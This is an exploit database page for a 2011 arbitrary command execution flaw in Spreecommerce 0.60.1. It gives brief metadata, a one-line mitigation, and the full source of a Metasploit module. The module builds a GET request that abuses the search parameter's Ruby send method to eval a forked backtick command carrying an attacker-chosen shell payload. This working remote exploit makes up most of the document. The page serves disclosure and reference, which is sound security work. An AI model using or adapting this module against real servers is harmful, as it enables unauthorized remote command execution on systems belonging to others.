header-logo
Suggest Exploit
vendor:
Spreecommerce
by:
joernchen
N/A
CVSS
N/A
Arbitrary Command Execution
78
CWE
Product Name: Spreecommerce
Affected Version From: 0.60.1
Affected Version To: 0.60.1
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Unix, Linux
2011

Spreecommerce 0.60.1 Arbitrary Command Execution

This module exploits an arbitrary command execution vulnerability in the Spreecommerce search. Unvalidated input is called via the Ruby send method allowing command execution.

Mitigation:

Validate user input before passing it to the send method.
Source

Exploit-DB raw data:

##
# $Id: spree_search_exec.rb 13831 2011-10-07 17:45:15Z sinn3r $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Spreecommerce 0.60.1 Arbitrary Command Execution',
			'Description'    => %q{
					This module exploits an arbitrary command execution vulnerability in the
					Spreecommerce search. Unvalidated input is called via the 
					Ruby send method allowing command execution.
			},
			'Author'         => [ 'joernchen <joernchen[at]phenoelit.de>' ], #Phenoelit
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 13831 $',
			'References'     =>
				[
					[ 'OSVDB', '76011'],
					[ 'URL', 'http://spreecommerce.com/blog/2011/10/05/remote-command-product-group/' ],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'BadChars' => "\x60",
					'DisableNops' => true,
					'Space'       => 31337,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
						}
				},
			'Platform'       => [ 'unix', 'linux' ],
			'Arch'           => ARCH_CMD,
			'Targets'        => [[ 'Automatic', { }]],
			'DefaultTarget'  => 0))

			register_options(
				[
					OptString.new('URI', [true, "The path to the Spreecommerce main site", "/"]),
				], self.class)
	end

	def exploit
		command = Rex::Text.uri_encode(payload.raw, 'hex-all')
		res = send_request_raw({
			'uri'     => datastore['URI']+ "?search[send][]=eval&search[send][]=Kernel.fork%20do%60#{command}%60end",
			'method'  => 'GET',
			'headers' =>
			{
				'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
				'Connection' => 'Close',
			}
		}, 0.4 ) #short timeout, we don't care about the response
			
		if (res)
			print_status("The server returned: #{res.code} #{res.message}")
		end
			
		handler
	end

end

Navigation

Suggest Exploit

Services By CQR